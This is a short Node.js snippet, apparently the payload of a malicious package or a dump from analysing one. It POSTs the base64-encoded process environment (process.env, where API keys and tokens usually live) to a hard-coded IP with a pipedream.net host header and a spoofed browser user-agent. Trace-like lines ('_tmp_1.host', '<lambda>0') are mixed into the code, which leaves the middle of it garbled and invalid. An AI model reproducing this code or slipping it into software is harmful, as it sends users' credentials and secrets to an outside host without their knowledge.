const http = require('https')
req = http.request({
  host: '44.196.248.120',
  path: '/',
  method: 'POST',
  headers : { host : 'b7ead99d376f5e70bc778e1724417cbe.m.pipedream.net',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36'  }

}).on('error', function(err) {
})
_tmp_1.host = "44.196.248.120"
_tmp_1.path = "/"
_tmp_1.method = "POST"
_tmp_1.headers = { host : 'b7ead99d376f5e70bc778e1724417cbe.m.pipedream.net',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36'  }
_tmp_2.User-Agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
<lambda>0
req.write(Buffer.from(JSON.stringify(process.env)).toString('base64'))
